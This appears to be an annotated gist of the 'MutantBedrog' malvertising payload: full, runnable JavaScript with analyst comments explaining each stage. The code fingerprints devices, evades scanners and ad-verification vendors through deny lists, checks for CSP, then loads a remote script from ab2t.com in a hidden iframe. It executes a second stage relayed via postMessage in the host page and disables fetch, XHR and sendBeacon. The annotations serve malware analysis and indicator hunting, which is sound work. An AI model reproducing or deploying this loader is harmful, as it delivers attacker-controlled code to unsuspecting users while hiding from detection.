@eliyastein
Created September 6, 2024 17:19
MutantBedrog Payload
// Analyst note: stores the URL-encoded pipe character ("%7C") in the global `_tk`.
// The value is read back further down (`window['_tk'] || 0`) and becomes the
// `tid=` query parameter of the second-stage script URL.
window._tk = encodeURIComponent('|')
// Analyst note: `ce` is the environment gate. It returns true only when every
// entry of the array built below is truthy; any exception thrown while the
// checks are evaluated is caught and turned into `false`. `ce`, `cr` and `cstr`
// are assigned without a declaration keyword, so in sloppy mode they become
// properties of the global object and are observable from a debugger console.
// Practical consequence for analysis: a sandbox or crawler that fails any one
// of these checks never reaches the network stage, so the absence of outbound
// traffic from this creative is not evidence that it is benign.
ce = () => {
// cr: GPU fingerprint check through WebGL.
// Returns false when no 'webgl' context can be created. Otherwise reads the
// unmasked vendor and renderer strings and returns true only if the vendor is
// an exact match for an entry in V and the renderer matches that entry's regex.
// If the WEBGL_debug_renderer_info extension is unavailable, `D` is null and
// the property access throws; the throw is caught by the try block in `ce`
// (the call to cr() sits inside it), so the gate fails.
cr = () => {
const j = document.createElement('canvas'),
y = j.getContext('webgl')
if (!y) {
return false
}
const D = y.getExtension('WEBGL_debug_renderer_info'),
U = y.getParameter(D.UNMASKED_VENDOR_WEBGL),
p = y.getParameter(D.UNMASKED_RENDERER_WEBGL),
// Accepted vendor / renderer pairs. Any pair not listed here fails the check;
// presumably this filters out software or virtualised renderers (inferred from
// the list, not stated in the code).
V = [
{
v: 'ARM',
r: /Mali/,
},
{
v: 'Qualcomm',
r: /Adreno/,
},
{
v: 'Imagination Technologies',
r: /PowerVR/,
},
{
v: 'Samsung',
r: /Mali/,
},
{
v: 'NVIDIA Corporation',
r: /NVIDIA/,
},
{
v: 'Intel Inc.',
r: /Intel/,
},
{
v: 'Samsung Electronics',
r: /Xclipse/,
},
]
return V.some((q) => q.v === U && q.r.test(p))
}
// cstr(j, y, D = true): substring matcher used for the allow/deny lists below.
//   j - string to inspect (a URL when D is true, otherwise used as-is)
//   y - array of substrings; empty strings are filtered out before matching
//   D - when true, `j` is parsed with `new URL` and only the hostname is searched
// Returns false for a blank `j`, true when any entry of `y` occurs in the
// searched string, and also true when anything throws (for example `j` is not
// a parseable URL). Because the deny-list callers negate the result, a parse
// failure makes the gate fail, while a blank input makes that check pass.
cstr = (j, y, D = true) => {
if (j.trim() === '') {
return false
}
try {
var U = j
return (
D && (U = new URL(j).hostname),
(y = y.filter((p) => p !== '')),
y.some((p) => U.includes(p))
)
} catch (p) {
return true
}
}
try {
// B = URL of the embedding context: this window's own URL when it is the top
// window, else the parent's URL; if reading the parent throws (cross-origin
// frame), it falls back to document.referrer.
var B = ''
try {
if (window === parent) {
B = location.href
} else {
B = parent.location.href
}
} catch (j) {
B = document.referrer
}
// Every element must be truthy. The first ten entries are device signals
// (WebGL GPU pair, 'android' in the UA, multi-touch, no plugins, touch events,
// coarse pointer, no getDisplayMedia, window.orientation present, 'linux armv'
// platform). A missing navigator.mediaDevices makes the typeof expression
// throw, which the outer catch converts to false.
return [
cr(),
navigator.userAgent.toLowerCase().includes('android'),
navigator.maxTouchPoints > 1,
navigator.plugins.length === 0,
'ontouchstart' in document.documentElement,
window.matchMedia('(pointer:coarse)').matches,
window.matchMedia('(any-pointer:coarse)').matches,
typeof navigator.mediaDevices.getDisplayMedia === 'undefined',
typeof window.orientation !== 'undefined',
navigator.platform.toLowerCase().includes('linux armv'),
// User-agent deny list (plain substring match on the lower-cased UA, no URL
// parsing). The entries read as scanner, crawler, HTTP-client and
// ad-verification identifiers; a UA containing any of them fails the gate.
!cstr(
navigator.userAgent.toLowerCase(),
[
'ptst',
'virustotal',
'axios',
'lighthouse',
'curl',
'http',
'nessus',
'python',
'headless',
'spider',
'adbeat',
'ahrefs',
'bing',
'microsoft',
'facebook',
'bot',
'tmt',
'themediatrust',
'geoedge',
],
false
),
// Hostname deny list applied to B (D defaults to true, so only the hostname of
// the embedding URL / referrer is searched). Entries look like ad-exchange and
// ad-verification vendor names plus generic words such as 'test', 'preview'
// and 'localhost'. 'adometry' is listed twice in the original.
!cstr(B.toLowerCase(), [
'adnxs',
'xandr',
'secure',
'google',
'preview',
'geoedge',
'safe',
'2mdn',
'doubleclick',
'tmt',
'localhost',
'test',
'confiant',
'adometry',
'ias',
'adometry',
'xpose',
'yapper',
'doubleverify',
'project',
'proximic',
'peer39',
'psb',
'realvu',
'media',
'whiteops',
'pixalate',
'trustmetrics',
'impact',
'moat',
'forensiq',
]),
// Locale requirement: the first two characters of navigator.language must
// contain 'pt'. This is the only check that is not negated.
cstr(navigator.language.substr(0, 2).toLowerCase(), ['pt'], false),
].every((y) => y)
} catch (y) {
return false
}
}
// Analyst note: `cp` is the staged loader, invoked repeatedly by the `_cit`
// interval. Nothing happens until document.readyState is 'complete'; at that
// point the interval is cleared and the stages below run in order:
//   1. ce() environment gate and presence of navigator.getBattery
//   2. battery must report "not charging"
//   3. co(): page must show no CSP / cross-origin policy indicators
//   4. Trusted Types must be available
//   5. a hidden srcdoc iframe loads a remote script and relays results via
//      postMessage
// Strings visible in this block that can serve as indicators when hunting:
// the Trusted Types policy name 'rp', the postMessage value 'distroy', the
// message property `secd`, and the URL embedded in the string `y`.
cp = () => {
document.readyState === 'complete' &&
(clearInterval(_cit),
ce() &&
'getBattery' in navigator &&
navigator
.getBattery()
.then((B) => {
// Proceeds only when the device is not charging. Presumably another
// anti-analysis signal (lab devices and emulators tend to report charging);
// that intent is inferred, the code only tests `B.charging`.
!B.charging &&
// co (implicit global): resolves to true when the page shows signs of a
// content-security or cross-origin policy, in which case the loader stops.
// It checks <meta http-equiv> values first, then issues a HEAD request to
// location.href and inspects the response header names. An
// Access-Control-Allow-Origin header with any value other than '*' also
// counts. A non-http(s) location or any fetch error resolves to false.
// The HEAD request to the page's own URL is itself an observable artefact.
((co = async () => {
let j = document.getElementsByTagName('meta')
for (let y = 0; y < j.length; y++) {
let D = j[y].httpEquiv
if (
D &&
(D.toLowerCase().includes('content-security') ||
D.toLowerCase().includes('cross-origin'))
) {
return true
}
}
try {
if (location.href.indexOf('http') < 0) {
return false
}
let U = await fetch(location.href, { method: 'HEAD' })
for (let [p, V] of U.headers) {
if (
p.toLowerCase().includes('content-security') ||
p.toLowerCase().includes('cross-origin')
) {
return true
}
if (
p.toLowerCase() === 'access-control-allow-origin' &&
V !== '*'
) {
return true
}
}
} catch (q) {
return false
}
return false
}),
co().then((j) => {
// Continue only when no policy indicator was found and the browser exposes
// the Trusted Types API.
if (!j && typeof trustedTypes !== 'undefined') {
try {
// `y` is JavaScript source that will run inside the iframe. Read as text, it:
//   - defines et(): current Unix time in seconds, each character code shifted
//     by +10, then base64- and URI-encoded (sent as the `p=` parameter);
//   - creates a Trusted Types policy "rp" whose createScriptURL returns its
//     input unchanged;
//   - appends a <script> whose src is the ab2t.com URL below, with `tid=` taken
//     from window._tk in the outer window at string-build time;
//   - on load or error removes that script and posts "distroy" to the parent
//     with target origin "*".
var y =
'\net = () => {\n var t = Math.round(Date.now() / 1000).toString();\n var es = "";\n for (var i = 0; i < t.length; i++) {\n var c = t.charCodeAt(i);\n es += String.fromCharCode(c + 10);\n }\n return encodeURIComponent(btoa(es));\n};\ntry {\nif (typeof trustedTypes !== "undefined") {\nconst rp = trustedTypes.createPolicy("rp", {\ncreateScriptURL: (input) => input,\n});\nvar script = document.createElement("script");\nscript.src = rp.createScriptURL(\n"https://ab2t.com/v2/banner/pix?id=5d83bs12&aid=ttd006&tid=' +
(window['_tk'] || 0) +
'&p="+et()\n);\nscript.type = "text/javascript";\nscript.onload = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\nscript.onerror = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\ndocument.head.appendChild(script);\n}\n} catch (e) {}'
// Pass-through policy: createHTML returns its input unchanged, so the policy
// performs no sanitisation and only produces a TrustedHTML wrapper.
const U = trustedTypes.createPolicy('rp', {
createHTML: (p) => p,
})
var D = document.createElement('iframe')
// '</sc' + 'ript>' splits the closing tag so the literal sequence does not
// appear in this source text.
D.setAttribute(
'srcdoc',
U.createHTML('<script>' + y + '</sc' + 'ript>')
)
// Zero-size, hidden, absolutely positioned: the frame is not visible to the user.
D.setAttribute(
'style',
'width: 0; height: 0; border: none; position: absolute; visibility: hidden;'
)
// Insertion is delayed by a random 100-1099 ms.
setTimeout(() => {
document.body.appendChild(D)
// Message handler for the relay channel. No check of p.origin or p.source is
// visible, so it reacts to any message with the expected shape.
window.addEventListener('message', function (p) {
// 'distroy' => tear down the hidden iframe.
p.data === 'distroy' && D.parentNode.removeChild(D)
// A message carrying `secd` delivers the next stage as script source text.
if (p.data.secd) {
try {
// Registers a throwaway interval to obtain a current timer id `q`, then
// clears ids 1 .. q+19 as both intervals and timeouts. This relies on timer
// ids being issued in increasing order and cancels timers already scheduled
// in this window, including the throwaway one.
const q = window.setInterval(function () {},
Number.MAX_SAFE_INTEGER)
for (let T = 1; T < q + 20; T++) {
window.clearInterval(T)
window.clearTimeout(T)
}
// Replaces sendBeacon, fetch, XMLHttpRequest.open and XMLHttpRequest.send
// with stubs that send nothing. Code that later calls these APIs in this
// window no longer produces requests through them; likely meant to silence
// reporting or measurement scripts (intent inferred). Stubbed network
// primitives are a strong tamper indicator when inspecting a live page.
navigator.sendBeacon = function (t, W) {
return true
}
window.fetch = function (t, W) {
return new Promise((b) => b())
}
XMLHttpRequest.prototype.open = function (
t,
W,
b,
k,
z
) {}
XMLHttpRequest.prototype.send = function (t) {}
} catch (t) {}
try {
if (typeof trustedTypes !== 'undefined') {
// Second pass-through policy, this time for createScript: the received
// `secd` text is wrapped unchanged and executed as an inline script in the
// document that hosts this loader (not in the hidden iframe).
const W = trustedTypes.createPolicy('rp', {
createScript: (b) => b,
})
var V = document.createElement('script')
V.textContent = W.createScript(p.data.secd)
V.type = 'text/javascript'
V.onload = function () {
V.parentNode.removeChild(V)
}
V.onerror = function () {
V.parentNode.removeChild(V)
}
document.head.appendChild(V)
}
} catch (b) {}
}
})
}, Math.floor(Math.random() * 1000) + 100)
// Errors in this stage are swallowed, so failures leave no console trace.
} catch (p) {}
}
}))
})
.catch((B) => {}))
}
// Analyst note: entry point. Polls `cp` every 100 ms; `cp` clears this interval
// itself (clearInterval(_cit)) once document.readyState is 'complete'.
var _cit = setInterval(cp, 100)